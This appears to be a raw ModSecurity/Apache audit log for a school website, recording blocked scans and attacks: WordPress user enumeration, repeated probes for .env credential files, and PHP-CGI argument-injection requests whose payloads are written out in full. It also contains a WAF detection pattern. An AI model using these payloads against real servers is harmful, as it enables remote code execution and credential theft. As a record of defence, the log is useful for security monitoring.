[level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745638857464161 3096 (- - -) Stopwatch2: 1745638857464161 3096; combined=1504, p1=522, p2=951, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce606115-Z-- --ec8b180e-A-- [26/Apr/2025:12:08:40 +0700] aAxqWHGCMLWH05JCdxwgIQAAAI0 103.236.140.4 49786 103.236.140.4 8181 --ec8b180e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.123.207.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.123.207.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec8b180e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec8b180e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644120715244 2830 (- - -) Stopwatch2: 1745644120715244 2830; combined=1227, p1=414, p2=784, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec8b180e-Z-- --f5ed3922-A-- [26/Apr/2025:12:13:40 +0700] aAxrhNDEbIDiBZnoTx5KWwAAAE0 103.236.140.4 50886 103.236.140.4 8181 --f5ed3922-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.92.155.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.92.155.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f5ed3922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5ed3922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644420491778 3541 (- - -) Stopwatch2: 1745644420491778 3541; combined=1533, p1=521, p2=973, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5ed3922-Z-- --84080413-A-- [26/Apr/2025:12:17:45 +0700] aAxseXGCMLWH05JCdxwhLwAAAII 103.236.140.4 51836 103.236.140.4 8181 --84080413-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.134.39.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.134.39.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84080413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84080413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644665948829 2470 (- - -) Stopwatch2: 1745644665948829 2470; combined=1417, p1=438, p2=945, p3=0, p4=0, p5=34, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84080413-Z-- --a7a3fd41-A-- [26/Apr/2025:12:50:49 +0700] aAx0OdDEbIDiBZnoTx5M5AAAAFA 103.236.140.4 59448 103.236.140.4 8181 --a7a3fd41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.58.24.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.58.24.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a7a3fd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7a3fd41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745646649893881 2865 (- - -) Stopwatch2: 1745646649893881 2865; combined=1526, p1=467, p2=1016, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7a3fd41-Z-- --9bafbf7d-A-- [26/Apr/2025:12:53:56 +0700] aAx09NDEbIDiBZnoTx5NKQAAAEE 103.236.140.4 60218 103.236.140.4 8181 --9bafbf7d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --9bafbf7d-C-- --9bafbf7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bafbf7d-E-- --9bafbf7d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745646836387890 5326 (- - -) Stopwatch2: 1745646836387890 5326; combined=3425, p1=597, p2=2787, p3=0, p4=0, p5=41, sr=96, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bafbf7d-Z-- --85a8c57e-A-- [26/Apr/2025:14:41:55 +0700] aAyOQ9DEbIDiBZnoTx5TxgAAAEc 103.236.140.4 57106 103.236.140.4 8181 --85a8c57e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 146.190.63.248 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 146.190.63.248 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --85a8c57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85a8c57e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745653315141751 901 (- - -) Stopwatch2: 1745653315141751 901; combined=291, p1=257, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85a8c57e-Z-- --909e456a-A-- [26/Apr/2025:15:14:05 +0700] aAyVzXGCMLWH05JCdxwqlgAAAJg 103.236.140.4 36442 103.236.140.4 8181 --909e456a-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 207.154.197.113 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --909e456a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --909e456a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745655245090814 799 (- - -) Stopwatch2: 1745655245090814 799; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --909e456a-Z-- --c94d790b-A-- [26/Apr/2025:15:58:15 +0700] aAygJ9DEbIDiBZnoTx5YSgAAAEs 103.236.140.4 46504 103.236.140.4 8181 --c94d790b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.4.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.4.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c94d790b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c94d790b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745657895923778 766 (- - -) Stopwatch2: 1745657895923778 766; combined=336, p1=287, p2=0, p3=0, p4=0, p5=49, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c94d790b-Z-- --a4aefe15-A-- [26/Apr/2025:16:08:41 +0700] aAyimdDEbIDiBZnoTx5Y2QAAAE8 103.236.140.4 48954 103.236.140.4 8181 --a4aefe15-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a4aefe15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4aefe15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745658521120901 830 (- - -) Stopwatch2: 1745658521120901 830; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4aefe15-Z-- --29ae5a06-A-- [26/Apr/2025:16:18:14 +0700] aAyk1nGCMLWH05JCdxwurAAAAIA 103.236.140.4 51268 103.236.140.4 8181 --29ae5a06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 AOL/11.0 AOLBUILD/11.0.1305 Safari/537.36 Accept-Charset: utf-8 --29ae5a06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ae5a06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659094980842 12905 (- - -) Stopwatch2: 1745659094980842 12905; combined=24503, p1=277, p2=0, p3=0, p4=0, p5=12134, sr=74, sw=0, l=0, gc=12092 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ae5a06-Z-- --5c120458-A-- [26/Apr/2025:16:23:01 +0700] aAyl9XGCMLWH05JCdxwu4AAAAJM 103.236.140.4 52366 103.236.140.4 8181 --5c120458-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1 Accept-Charset: utf-8 --5c120458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c120458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659381779575 766 (- - -) Stopwatch2: 1745659381779575 766; combined=327, p1=286, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c120458-Z-- --f99f4b4f-A-- [26/Apr/2025:16:23:08 +0700] aAyl_HGCMLWH05JCdxwu5QAAAII 103.236.140.4 52396 103.236.140.4 8181 --f99f4b4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 Accept-Charset: utf-8 --f99f4b4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99f4b4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745659388681350 768 (- - -) Stopwatch2: 1745659388681350 768; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99f4b4f-Z-- --301ebd52-A-- [26/Apr/2025:16:53:39 +0700] aAytI3GCMLWH05JCdxwwsQAAAIQ 103.236.140.4 59542 103.236.140.4 8181 --301ebd52-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --301ebd52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301ebd52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745661219707000 946 (- - -) Stopwatch2: 1745661219707000 946; combined=420, p1=375, p2=0, p3=0, p4=0, p5=44, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301ebd52-Z-- --e398b455-A-- [26/Apr/2025:17:50:48 +0700] aAy6iHGCMLWH05JCdxwzigAAAJc 103.236.140.4 44566 103.236.140.4 8181 --e398b455-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931 Accept-Charset: utf-8 --e398b455-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e398b455-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745664648301756 799 (- - -) Stopwatch2: 1745664648301756 799; combined=377, p1=322, p2=0, p3=0, p4=0, p5=55, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e398b455-Z-- --872e4e65-A-- [26/Apr/2025:17:54:41 +0700] aAy7cXGCMLWH05JCdxwzuwAAAIE 103.236.140.4 45454 103.236.140.4 8181 --872e4e65-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --872e4e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --872e4e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745664881929929 716 (- - -) Stopwatch2: 1745664881929929 716; combined=258, p1=225, p2=0, p3=0, p4=0, p5=32, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872e4e65-Z-- --3666a176-A-- [26/Apr/2025:18:04:12 +0700] aAy9rNDEbIDiBZnoTx5fnwAAAFg 103.236.140.4 47780 103.236.140.4 8181 --3666a176-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --3666a176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3666a176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745665452486202 891 (- - -) Stopwatch2: 1745665452486202 891; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3666a176-Z-- --b150ce12-A-- [26/Apr/2025:18:04:56 +0700] aAy92E3IXD9XJ6lrmIX_owAAABM 103.236.140.4 47952 103.236.140.4 8181 --b150ce12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) Accept-Charset: utf-8 --b150ce12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b150ce12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745665496357436 791 (- - -) Stopwatch2: 1745665496357436 791; combined=298, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b150ce12-Z-- --da729150-A-- [26/Apr/2025:18:10:15 +0700] aAy_F3GCMLWH05JCdxw0QAAAAJg 103.236.140.4 49162 103.236.140.4 8181 --da729150-B-- POST /?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 112.215.146.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.215.146.98 X-Forwarded-Proto: https Connection: close Content-Length: 36 User-Agent: python-requests/2.28.2 Accept: */* --da729150-C-- ;echo 1337; die; --da729150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da729150-E-- --da729150-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 -d auto_prepend_file=php://input: \xadd allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745665815171468 3958 (- - -) Stopwatch2: 1745665815171468 3958; combined=2350, p1=445, p2=1872, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da729150-Z-- --76b93e40-A-- [26/Apr/2025:18:16:31 +0700] 